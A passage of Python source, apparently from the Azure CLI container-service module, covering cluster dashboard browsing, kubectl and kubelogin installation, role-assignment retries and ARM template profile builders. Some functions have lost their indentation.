from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import CONST_OPEN_SERVICE_MESH_ADDON_NAME
from ._consts import (CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME,
CONST_SECRET_ROTATION_ENABLED,
CONST_ROTATION_POLL_INTERVAL)
from ._consts import ADDONS
from ._consts import CONST_CANIPULL_IMAGE
from ._consts import CONST_MANAGED_IDENTITY_OPERATOR_ROLE, CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID
from ._consts import DecoratorEarlyExitException
from .addonconfiguration import (
add_monitoring_role_assignment,
add_ingress_appgw_addon_role_assignment,
add_virtual_node_role_assignment,
ensure_default_log_analytics_workspace_for_monitoring,
ensure_container_insights_for_monitoring,
)
from ._resourcegroup import get_rg_location
from ._validators import extract_comma_separated_string
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
    """Return the full path of `binary` found on PATH, or None when absent.

    On Windows the `.exe` extension is appended before searching.
    """
    # Guard against an unset PATH (the original crashed on `None.split`).
    path_var = os.getenv('PATH', '')
    if platform.system() == 'Windows':
        binary = binary + '.exe'
    # os.pathsep is ';' on Windows and ':' elsewhere, replacing the manual branch.
    for part in path_var.split(os.pathsep):
        bin_path = os.path.join(part, binary)
        # isfile implies exists, so the original's separate exists() check is dropped.
        if os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
            return bin_path
    return None
def get_cmd_test_hook_data(filename):
    """Load JSON test-hook data shipped under tests/latest/data, or None when absent."""
    module_dir = os.path.dirname(os.path.realpath(__file__))
    hook_path = os.path.join(module_dir, 'tests/latest/data', filename)
    if not os.path.exists(hook_path):
        return None
    with open(hook_path, "r") as f:
        return json.load(f)
def wait_then_open(url):
    """
    Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
    """
    for _ in range(1, 10):
        try:
            urlopen(url, context=_ssl_context())
            # URL is reachable: stop polling. The original `break` sat at loop-body
            # level, so the "retry" loop always terminated after one iteration.
            break
        except URLError:
            time.sleep(1)
    webbrowser.open_new_tab(url)
def wait_then_open_async(url):
    """
    Spawns a daemon thread that waits for a bit then opens a URL.
    """
    # `args` must be a tuple; the original `args=({url})` built a one-element SET
    # literal, which only worked by accident of Thread unpacking any iterable.
    t = threading.Thread(target=wait_then_open, args=(url,))
    t.daemon = True
    t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
    """Open a browser to the web interface of the cluster orchestrator.

    :param name: Name of the target Azure container service instance.
    :type name: String
    :param resource_group_name: Name of Azure container service's resource group.
    :type resource_group_name: String
    :param disable_browser: If true, don't launch a web browser after establishing the proxy.
    :type disable_browser: bool
    :param ssh_key_file: If set, a path to an SSH key to use; only applies to DCOS.
    :type ssh_key_file: string
    """
    cluster_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _acs_browse_internal(cmd, client, cluster_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
    """Dispatch to the orchestrator-specific browse implementation."""
    orchestrator_type = acs_info.orchestrator_profile.orchestrator_type  # pylint: disable=no-member
    is_kubernetes = (
        str(orchestrator_type).lower() == 'kubernetes' or
        orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or
        (acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'))  # pylint: disable=no-member
    if is_kubernetes:
        return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
    is_dcos = str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos
    if is_dcos:
        return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
    raise CLIError(
        'Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
    """Launch a proxy and browse the Kubernetes web UI.

    :param disable_browser: If true, don't launch a web browser after establishing the proxy.
    :type disable_browser: bool
    """
    cluster_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _k8s_browse_internal(name, cluster_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
    """Fetch cluster credentials, start `kubectl proxy` and optionally open the dashboard.

    Blocks in the final `subprocess.call` until the proxy is terminated.
    """
    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')
    browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
    # Start from a fresh kubeconfig; stale credentials are discarded.
    if os.path.exists(browse_path):
        os.remove(browse_path)
    _k8s_get_credentials_internal(
        name, acs_info, browse_path, ssh_key_file, False)
    logger.warning('Proxy running on 127.0.0.1:8001/ui')
    logger.warning('Press CTRL+C to close the tunnel...')
    if not disable_browser:
        # Opens the browser asynchronously once the proxy below starts answering.
        wait_then_open_async('http://127.0.0.1:8001/ui')
    subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
    """Create an SSH tunnel to the Azure container service and open the Mesosphere DC/OS dashboard.

    :param name: Name of the target Azure container service instance.
    :type name: String
    :param resource_group_name: Name of Azure container service's resource group.
    :type resource_group_name: String
    :param disable_browser: If true, don't launch a web browser after establishing the proxy.
    :type disable_browser: bool
    :param ssh_key_file: Path to the SSH key to use.
    :type ssh_key_file: string
    """
    cluster_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _dcos_browse_internal(cluster_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
    """SSH to the cluster, start the octarine proxy, tunnel it locally and open the dashboard.

    The local HTTP proxy setting is always reverted in the `finally` block,
    even if the tunnel fails.
    """
    if not os.path.isfile(ssh_key_file):
        raise CLIError(
            'Private key file {} does not exist'.format(ssh_key_file))
    acs = acs_client.ACSClient()
    if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
                       key_filename=ssh_key_file):
        raise CLIError('Error connecting to ACS: {}'.format(
            _get_host_name(acs_info)))
    # octarine is the proxy binary expected on every DC/OS master.
    octarine_bin = '/opt/mesosphere/bin/octarine'
    if not acs.file_exists(octarine_bin):
        raise CLIError(
            'Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
    # Random id so concurrent sessions don't collide.
    proxy_id = _rand_str(16)
    proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
    acs.run(proxy_cmd, background=True)
    # Parse the output to get the remote PORT
    proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
    stdout, _ = acs.run(proxy_client_cmd)
    remote_port = int(stdout.read().decode().strip())
    local_port = acs.get_available_local_port()
    # Set the proxy
    proxy.set_http_proxy('127.0.0.1', local_port)
    logger.warning('Proxy running on 127.0.0.1:%s', local_port)
    logger.warning('Press CTRL+C to close the tunnel...')
    if not disable_browser:
        wait_then_open_async('http://127.0.0.1')
    try:
        acs.create_tunnel(
            remote_host='127.0.0.1',
            remote_port=remote_port,
            local_port=local_port)
    finally:
        proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
    """Install the client CLI matching the cluster's orchestrator (kubectl or dcos)."""
    cluster_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    orchestrator_type = cluster_info.orchestrator_profile.orchestrator_type  # pylint: disable=no-member
    kwargs = {'install_location': install_location}
    if client_version:
        kwargs['client_version'] = client_version
    if orchestrator_type == 'kubernetes':
        return k8s_install_cli(**kwargs)
    if orchestrator_type == 'dcos':
        return dcos_install_cli(**kwargs)
    raise CLIError(
        'Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
    """Return an SSL context, with a legacy fallback for old Pythons / Cloud Shell on Windows."""
    needs_legacy_context = (
        sys.version_info < (3, 4) or
        (in_cloud_console() and platform.system() == 'Windows'))
    if needs_legacy_context:
        try:
            # added in python 2.7.13 and 3.6
            return ssl.SSLContext(ssl.PROTOCOL_TLS)
        except AttributeError:
            return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    return ssl.create_default_context()
def _urlretrieve(url, filename):
    """Download `url` and write the response body to `filename`."""
    response = urlopen(url, context=_ssl_context())
    with open(filename, "wb") as f:
        f.write(response.read())
def _unzip(src, dest):
    """Extract the zip archive `src` into the directory `dest`."""
    logger.debug('Extracting %s to %s.', src, dest)
    if platform.system() not in ('Linux', 'Darwin', 'Windows'):
        raise CLIError('The current system is not supported.')
    with zipfile.ZipFile(src, 'r') as archive:
        archive.extractall(dest)
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
    """
    Downloads the dcos command line from Mesosphere and installs it at
    `install_location`, marking it executable.
    """
    system = platform.system()
    if not install_location:
        raise CLIError(
            "No install location specified and it could not be determined from the current platform '{}'".format(
                system))
    base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
    if system == 'Windows':
        file_url = base_url.format('windows', client_version, 'dcos.exe')
    elif system == 'Linux':
        # TODO Support ARM CPU here
        file_url = base_url.format('linux', client_version, 'dcos')
    elif system == 'Darwin':
        file_url = base_url.format('darwin', client_version, 'dcos')
    else:
        # The original raised a copy-pasted "Proxy server ... does not exist on the
        # cluster." message here; report the actual problem instead.
        raise CLIError("The current system '{}' is not supported.".format(system))
    logger.warning('Downloading client to %s', install_location)
    try:
        _urlretrieve(file_url, install_location)
        # Mark the downloaded binary executable for user/group/other.
        os.chmod(install_location,
                 os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    except IOError as err:
        raise CLIError(
            'Connection error while attempting to download client ({})'.format(err)) from err
def k8s_install_cli(cmd, client_version='latest', install_location=None, base_src_url=None,
                    kubelogin_version='latest', kubelogin_install_location=None,
                    kubelogin_base_src_url=None):
    """Install both kubectl and kubelogin."""
    k8s_install_kubectl(cmd, client_version, install_location, base_src_url)
    k8s_install_kubelogin(cmd, kubelogin_version, kubelogin_install_location, kubelogin_base_src_url)
def k8s_install_kubectl(cmd, client_version='latest', install_location=None, source_url=None):
    """
    Install kubectl, a command-line interface for Kubernetes clusters.

    `client_version` of 'latest' is resolved via the release channel's stable.txt;
    otherwise a 'v' prefix is added to the given version.
    """
    if not source_url:
        source_url = "https://storage.googleapis.com/kubernetes-release/release"
        cloud_name = cmd.cli_ctx.cloud.name
        if cloud_name.lower() == 'azurechinacloud':
            source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
    if client_version == 'latest':
        context = _ssl_context()
        version = urlopen(source_url + '/stable.txt', context=context).read()
        client_version = version.decode('UTF-8').strip()
    else:
        client_version = "v%s" % client_version
    system = platform.system()
    base_url = source_url + '/{}/bin/{}/amd64/{}'
    # ensure installation directory exists
    install_dir, cli = os.path.dirname(
        install_location), os.path.basename(install_location)
    if not os.path.exists(install_dir):
        os.makedirs(install_dir)
    if system == 'Windows':
        file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
    elif system == 'Linux':
        # TODO: Support ARM CPU here
        file_url = base_url.format(client_version, 'linux', 'kubectl')
    elif system == 'Darwin':
        file_url = base_url.format(client_version, 'darwin', 'kubectl')
    else:
        # The original raised a copy-pasted "Proxy server ... does not exist on the
        # cluster." message here; report the actual problem instead.
        raise CLIError("The current system '{}' is not supported.".format(system))
    logger.warning('Downloading client to "%s" from "%s"',
                   install_location, file_url)
    try:
        _urlretrieve(file_url, install_location)
        os.chmod(install_location,
                 os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    except IOError as ex:
        raise CLIError(
            'Connection error while attempting to download client ({})'.format(ex)) from ex
    if system == 'Windows':  # be verbose, as the install_location likely not in Windows's search PATHs
        env_paths = os.environ['PATH'].split(';')
        found = next((x for x in env_paths if x.lower().rstrip(
            '\\') == install_dir.lower()), None)
        if not found:
            # pylint: disable=logging-format-interpolation
            logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
                           ' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
                           'This is good for the current command session.\n'
                           ' 2. Update system PATH environment variable by following '
                           '"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
                           'You only need to do it once'.format(install_dir, cli))
    else:
        logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
                       install_dir, cli)
def k8s_install_kubelogin(cmd, client_version='latest', install_location=None, source_url=None):
    """
    Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.

    Downloads the release zip into a temporary directory, extracts the
    platform-specific binary and moves it to `install_location`.
    """
    cloud_name = cmd.cli_ctx.cloud.name
    if not source_url:
        source_url = 'https://github.com/Azure/kubelogin/releases/download'
        if cloud_name.lower() == 'azurechinacloud':
            source_url = 'https://mirror.azure.cn/kubernetes/kubelogin'
    if client_version == 'latest':
        context = _ssl_context()
        latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest'
        if cloud_name.lower() == 'azurechinacloud':
            latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest'
        latest_release = urlopen(latest_release_url, context=context).read()
        client_version = json.loads(latest_release)['tag_name'].strip()
    else:
        client_version = "v%s" % client_version
    base_url = source_url + '/{}/kubelogin.zip'
    file_url = base_url.format(client_version)
    # ensure installation directory exists
    install_dir, cli = os.path.dirname(
        install_location), os.path.basename(install_location)
    if not os.path.exists(install_dir):
        os.makedirs(install_dir)
    system = platform.system()
    if system == 'Windows':
        sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe'
    elif system == 'Linux':
        # TODO: Support ARM CPU here
        sub_dir, binary_name = 'linux_amd64', 'kubelogin'
    elif system == 'Darwin':
        if platform.machine() == 'arm64':
            sub_dir, binary_name = 'darwin_arm64', 'kubelogin'
        else:
            sub_dir, binary_name = 'darwin_amd64', 'kubelogin'
    else:
        # The original raised a copy-pasted "Proxy server ... does not exist on the
        # cluster." message here; report the actual problem instead.
        raise CLIError("The current system '{}' is not supported.".format(system))
    with tempfile.TemporaryDirectory() as tmp_dir:
        try:
            download_path = os.path.join(tmp_dir, 'kubelogin.zip')
            logger.warning('Downloading client to "%s" from "%s"',
                           download_path, file_url)
            _urlretrieve(file_url, download_path)
        except IOError as ex:
            raise CLIError(
                'Connection error while attempting to download client ({})'.format(ex)) from ex
        _unzip(download_path, tmp_dir)
        download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name)
        shutil.move(download_path, install_location)
    os.chmod(install_location, os.stat(install_location).st_mode |
             stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    if system == 'Windows':  # be verbose, as the install_location likely not in Windows's search PATHs
        env_paths = os.environ['PATH'].split(';')
        found = next((x for x in env_paths if x.lower().rstrip(
            '\\') == install_dir.lower()), None)
        if not found:
            # pylint: disable=logging-format-interpolation
            logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
                           ' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
                           'This is good for the current command session.\n'
                           ' 2. Update system PATH environment variable by following '
                           '"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
                           'You only need to do it once'.format(install_dir, cli))
    else:
        logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
                       install_dir, cli)
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
    """Create an AAD application and its service principal, retrying SP creation.

    Returns (service_principal_app_id, aad_session_key), or
    (False, aad_session_key) when every attempt failed.
    """
    # use get_progress_controller
    hook = cli_ctx.get_progress_controller(True)
    # Fixed the original 'messsage=' keyword typo; sibling hook.add calls use 'message='.
    hook.add(message='Creating service principal', value=0, total_val=1.0)
    logger.info('Creating service principal')
    # always create application with 5 years expiration
    start_date = datetime.datetime.utcnow()
    end_date = start_date + relativedelta(years=5)
    result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
                                                 start_date=start_date, end_date=end_date)
    service_principal = result.app_id  # pylint: disable=no-member
    for x in range(0, 10):
        hook.add(message='Creating service principal',
                 value=0.1 * x, total_val=1.0)
        try:
            create_service_principal(
                cli_ctx, service_principal, rbac_client=rbac_client)
            break
        # TODO figure out what exception AAD throws here sometimes.
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
            # Linear back-off to absorb AAD propagation delays.
            time.sleep(2 + 2 * x)
    else:
        # Loop exhausted without a successful creation.
        return False, aad_session_key
    hook.add(message='Finished service principal creation',
             value=1.0, total_val=1.0)
    logger.info('Finished service principal creation')
    return service_principal, aad_session_key
def _add_role_assignment(cmd, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
    """Assign `role` to the given principal, retrying while AAD data propagates.

    Makes up to 10 attempts with a linearly growing sleep between them.
    Returns True on success (an already-existing assignment counts as
    success), False when every attempt failed.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cmd.cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to propagate',
             value=0, total_val=1.0)
    logger.info('Waiting for AAD role to propagate')
    for x in range(0, 10):
        hook.add(message='Waiting for AAD role to propagate',
                 value=0.1 * x, total_val=1.0)
        try:
            # TODO: break this out into a shared utility library
            create_role_assignment(
                cmd, role, service_principal_msi_id, is_service_principal, scope=scope)
            break
        except CloudError as ex:
            # "Already exists" means the desired state is reached.
            if ex.message == 'The role assignment already exists.':
                break
            logger.info(ex.message)
        except CLIError as ex:
            logger.warning(str(ex))
        except Exception as ex:  # pylint: disable=broad-except
            logger.error(str(ex))
        time.sleep(delay + delay * x)
    else:
        # The for-loop finished without a break: all retries failed.
        return False
    hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
    logger.info('AAD role propagation done')
    return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
                            scope=None, include_inherited=False, yes=None, is_service_principal=True):
    """Delete role assignments by explicit ids, or by assignee/role/scope filters.

    With no filter at all (and no `yes`), asks for confirmation before wiping
    every assignment under the subscription.
    """
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    definitions_client = factory.role_definitions
    ids = ids or []
    if ids:
        if assignee or role or resource_group_name or scope or include_inherited:
            raise CLIError(
                'When assignment ids are used, other parameter values are not required')
        for i in ids:
            assignments_client.delete_by_id(i)
        return
    # The original listed `assignee` twice in this check; deduplicated (no behavior change).
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
        msg = 'This will delete all role assignments under the subscription. Are you sure?'
        if not prompt_y_n(msg, default="n"):
            return
    scope = _build_role_scope(resource_group_name, scope,
                              assignments_client.config.subscription_id)
    assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
                                           scope, assignee, role, include_inherited,
                                           include_groups=False, is_service_principal=is_service_principal)
    if assignments:
        for a in assignments:
            assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None, is_service_principal=True):
    """Delete role assignments for a principal, retrying while AAD data propagates.

    Returns True on success, False when all 10 attempts failed.
    A CLIError from the underlying delete is re-raised immediately (not retried).
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
    logger.info('Waiting for AAD role to delete')
    for x in range(0, 10):
        hook.add(message='Waiting for AAD role to delete',
                 value=0.1 * x, total_val=1.0)
        try:
            delete_role_assignments(cli_ctx,
                                    role=role,
                                    assignee=service_principal,
                                    scope=scope,
                                    is_service_principal=is_service_principal)
            break
        except CLIError as ex:
            # User-facing errors are not retried.
            raise ex
        except CloudError as ex:
            logger.info(ex)
        time.sleep(delay + delay * x)
    else:
        # Retries exhausted without a successful delete.
        return False
    hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
    logger.info('AAD role deletion done')
    return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
                             scope, assignee, role, include_inherited, include_groups,
                             is_service_principal=True):
    """Return role assignments matching the given assignee/role/scope filters.

    :param include_inherited: also match assignments whose scope pattern
        matches the requested scope (inherited from broader scopes).
    :param include_groups: when filtering by assignee, use the server-side
        "assignedTo" filter which includes group-derived assignments.
    """
    assignee_object_id = None
    if assignee:
        if is_service_principal:
            # Resolve the SPN to its AAD object id before filtering.
            assignee_object_id = _resolve_object_id(cli_ctx, assignee)
        else:
            assignee_object_id = assignee
    # always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
    if scope:
        assignments = list(assignments_client.list_for_scope(
            scope=scope, filter='atScope()'))
    elif assignee_object_id:
        if include_groups:
            f = "assignedTo('{}')".format(assignee_object_id)
        else:
            f = "principalId eq '{}'".format(assignee_object_id)
        assignments = list(assignments_client.list(filter=f))
    else:
        assignments = list(assignments_client.list())
    if assignments:
        # Narrow the scope match client-side: keep exact-scope matches, plus
        # (when include_inherited) assignments whose scope pattern matches.
        assignments = [a for a in assignments if (
            not scope or
            include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
            _get_role_property(a, 'scope').lower() == scope.lower()
        )]
        if role:
            role_id = _resolve_role_id(role, scope, definitions_client)
            assignments = [i for i in assignments if _get_role_property(
                i, 'role_definition_id') == role_id]
        if assignee_object_id:
            assignments = [i for i in assignments if _get_role_property(
                i, 'principal_id') == assignee_object_id]
    return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
def list_acs_locations(cmd, client):
    """Return the ACS regions grouped into production and preview availability."""
    locations = {}
    locations["productionRegions"] = regions_in_prod
    locations["previewRegions"] = regions_in_preview
    return locations
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(
default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(
default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict(
{"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(
_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
def _get_user_assigned_identity_resource_id_regular_expression():
return re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
    """Fetch a user-assigned identity by its ARM resource id via the MSI client.

    Raises InvalidArgumentValueError for an unparsable id,
    ResourceNotFoundError when the identity does not exist, and
    ClientRequestError for other service failures.
    """
    resource_id = resource_id.lower()
    match = _get_user_assigned_identity_resource_id_regular_expression().search(resource_id)
    if not match:
        raise InvalidArgumentValueError(
            "Cannot parse identity name from provided resource id {}.".format(resource_id))
    subscription_id, resource_group_name, identity_name = match.groups()
    msi_client = get_msi_client(cli_ctx, subscription_id)
    try:
        return msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
                                                       resource_name=identity_name)
    except CloudError as ex:
        if 'was not found' in ex.message:
            raise ResourceNotFoundError("Identity {} not found.".format(resource_id))
        raise ClientRequestError(ex.message)
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
    """Return the client id of the user-assigned identity at *resource_id*."""
    identity = _get_user_assigned_identity(cli_ctx, resource_id)
    return identity.client_id
def _get_user_assigned_identity_object_id(cli_ctx, resource_id):
    """Return the principal (object) id of the user-assigned identity at *resource_id*."""
    identity = _get_user_assigned_identity(cli_ctx, resource_id)
    return identity.principal_id
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
               location=None, admin_username="azureuser", api_version=None, master_profile=None,
               master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
               master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
               agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
               agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
               orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
               windows=False, admin_password="", generate_ssh_keys=False,  # pylint: disable=unused-argument
               validate=False, no_wait=False):
    """Create a new Acs.
    :param resource_group_name: The name of the resource group. The name
    is case insensitive.
    :type resource_group_name: str
    :param deployment_name: The name of the deployment.
    :type deployment_name: str
    :param dns_name_prefix: Sets the Domain name prefix for the cluster.
    The concatenation of the domain name and the regionalized DNS zone
    make up the fully qualified domain name associated with the public
    IP address.
    :type dns_name_prefix: str
    :param name: Resource name for the container service.
    :type name: str
    :param ssh_key_value: Configure all linux machines with the SSH RSA
    public key string. Your key should include three parts, for example
    'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm
    :type ssh_key_value: str
    :param content_version: If included it must match the ContentVersion
    in the template.
    :type content_version: str
    :param admin_username: User name for the Linux Virtual Machines.
    :type admin_username: str
    :param api_version: ACS API version to use
    :type api_version: str
    :param master_profile: MasterProfile used to describe master pool
    :type master_profile: dict
    :param master_vm_size: The size of master pool Virtual Machine
    :type master_vm_size: str
    :param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
    :type master_osdisk_size: int
    :param master_count: The number of masters for the cluster.
    :type master_count: int
    :param master_vnet_subnet_id: The vnet subnet id for master pool
    :type master_vnet_subnet_id: str
    :param master_storage_profile: The storage profile used for master pool.
    Possible value could be StorageAccount, ManagedDisk.
    :type master_storage_profile: str
    :param agent_profiles: AgentPoolProfiles used to describe agent pools
    :type agent_profiles: dict
    :param agent_vm_size: The size of the Virtual Machine.
    :type agent_vm_size: str
    :param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
    :type agent_osdisk_size: int
